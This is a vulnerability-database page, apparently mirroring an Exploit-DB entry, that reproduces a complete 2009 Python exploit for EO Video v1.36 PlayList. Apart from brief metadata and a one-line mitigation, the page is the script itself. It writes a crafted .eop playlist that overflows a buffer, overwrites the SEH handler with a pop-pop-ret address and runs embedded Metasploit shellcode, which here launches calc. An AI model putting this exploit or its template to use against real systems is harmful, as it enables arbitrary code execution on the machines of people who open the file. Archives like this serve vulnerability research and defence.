header-logo
Suggest Exploit
vendor:
EO Video Playlist
by:
j0rgan
7.8
CVSS
HIGH
Seh Overwrite Exploit
119
CWE
Product Name: EO Video Playlist
Affected Version From: EO Video v1.36 PlayList
Affected Version To: EO Video v1.36 PlayList
Patch Exists: Yes
Related CWE: N/A
CPE: a:eo_software:eo_video_playlist
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2 (Fr)
2009

EO Video v1.36 PlayList Seh Overwrite Exploit

This exploit is for EO Video v1.36 PlayList. It is a SEH overwrite exploit which is used to overwrite the SEH handler and execute malicious code. It was discovered by j0rgan and tested on Windows XP SP2 (Fr). It is written in Python language.

Mitigation:

Update to the latest version of EO Video v1.36 PlayList.
Source

Exploit-DB raw data:

#!/usr/bin/python
#usage: exploit.py
print "**************************************************************************"
print "[*] EO Video v1.36 PlayList Seh Overwrite Exploit\n"
print "[*] Author: j0rgan"
print "[*] Seh Exploitation : His0k4"
print "[*] Tested on: Windows XP SP2 (Fr)\n"
print "[*] Greetings to: All friends & Muslims HacKerS (DZ)"
print "**************************************************************************"

buff = "\x41" * 1356

next_seh = "\xEB\x06\x41\x41"

seh = "\x14\x1E\x5B\x58" #pop pop ret msgsm32 .acm

header1= (																		
	"\x3C\x45\x4F\x50\x6C\x61\x79\x6C\x69\x73\x74\x3E\x0A\x3C\x50\x6C\x61\x79\x6C"
	"\x69\x73\x74\x3E\x0A\x3C\x46\x6F\x6C\x64\x65\x72\x4C\x69\x73\x74\x3E\x0A\x3C"
	"\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x4E\x61\x6D\x65\x3E\x6E\x65\x73\x74\x6F"
	"\x3C\x2F\x4E\x61\x6D\x65\x3E\x0A\x3C\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65"
	"\x6E\x63\x79\x3E\x31\x3C\x2F\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63"
	"\x79\x3E\x0A\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x46\x6F\x6C\x64\x65"
	"\x72\x3E\x0A\x3C\x4E\x61\x6D\x65\x3E\x6E\x65\x73\x74\x6F\x3C\x2F\x4E\x61\x6D"
	"\x65\x3E\x0A\x3C\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63\x79\x3E\x31"
	"\x3C\x2F\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63\x79\x3E\x0A\x3C\x2F"
	"\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x4C\x69\x73"
	"\x74\x3E\x0A\x3C\x50\x72\x6F\x6A\x65\x63\x74\x45\x6C\x65\x6D\x65\x6E\x74\x3E"
	"\x0A\x3C\x4E\x61\x6D\x65\x3E")
	
header2= (
	"\x3C\x2F\x4E\x61\x6D\x65\x3E\x0A\x3C\x53\x74\x61\x72\x74\x54\x69\x6D\x65\x3E"
	"\x30\x3C\x2F\x53\x74\x61\x72\x74\x54\x69\x6D\x65\x3E\x0A\x3C\x45\x6E\x64\x54"
	"\x69\x6D\x65\x3E\x30\x3C\x2F\x45\x6E\x64\x54\x69\x6D\x65\x3E\x0A\x3C\x4D\x65"
	"\x64\x69\x61\x53\x69\x7A\x65\x3E\x0A\x3C\x57\x69\x64\x74\x68\x3E\x2D\x31\x3C"
	"\x2F\x57\x69\x64\x74\x68\x3E\x0A\x3C\x48\x65\x69\x67\x68\x74\x3E\x2D\x31\x3C"
	"\x2F\x48\x65\x69\x67\x68\x74\x3E\x0A\x3C\x2F\x4D\x65\x64\x69\x61\x53\x69\x7A"
	"\x65\x3E\x0A\x3C\x53\x74\x61\x74\x65\x3E\x33\x30\x32\x31\x36\x3C\x2F\x53\x74"
	"\x61\x74\x65\x3E\x0A\x3C\x46\x6F\x6C\x64\x65\x72\x50\x6F\x73\x69\x74\x69\x6F"
	"\x6E\x49\x6E\x64\x65\x78\x3E\x30\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x50\x6F\x73"
	"\x69\x74\x69\x6F\x6E\x49\x6E\x64\x65\x78\x3E\x0A\x3C\x2F\x50\x72\x6F\x6A\x65"
	"\x63\x74\x45\x6C\x65\x6D\x65\x6E\x74\x3E\x0A\x3C\x2F\x50\x6C\x61\x79\x6C\x69"
	"\x73\x74\x3E\x5C\x6E\x3C\x2F\x45\x4F\x50\x6C\x61\x79\x6C\x69\x73\x74\x3E")
	

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
	"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x35"
	"\x9c\xf7\xbc\x83\xeb\xfc\xe2\xf4\xc9\x74\xb3\xbc\x35\x9c\x7c\xf9"
	"\x09\x17\x8b\xb9\x4d\x9d\x18\x37\x7a\x84\x7c\xe3\x15\x9d\x1c\xf5"
	"\xbe\xa8\x7c\xbd\xdb\xad\x37\x25\x99\x18\x37\xc8\x32\x5d\x3d\xb1"
	"\x34\x5e\x1c\x48\x0e\xc8\xd3\xb8\x40\x79\x7c\xe3\x11\x9d\x1c\xda"
	"\xbe\x90\xbc\x37\x6a\x80\xf6\x57\xbe\x80\x7c\xbd\xde\x15\xab\x98"
	"\x31\x5f\xc6\x7c\x51\x17\xb7\x8c\xb0\x5c\x8f\xb0\xbe\xdc\xfb\x37"
	"\x45\x80\x5a\x37\x5d\x94\x1c\xb5\xbe\x1c\x47\xbc\x35\x9c\x7c\xd4"
	"\x09\xc3\xc6\x4a\x55\xca\x7e\x44\xb6\x5c\x8c\xec\x5d\x6c\x7d\xb8"
	"\x6a\xf4\x6f\x42\xbf\x92\xa0\x43\xd2\xff\x96\xd0\x56\x9c\xf7\xbc"
    )

exploit = header1 + buff + next_seh + seh + shellcode + header2

try:
    out_file = open("exploit.eop",'w')
    out_file.write(exploit)
    out_file.close()
    print "Exploit File Created!\nNow Open it :)"
except:
    print "Error"

# milw0rm.com [2009-03-09]

Navigation

Suggest Exploit

Services By CQR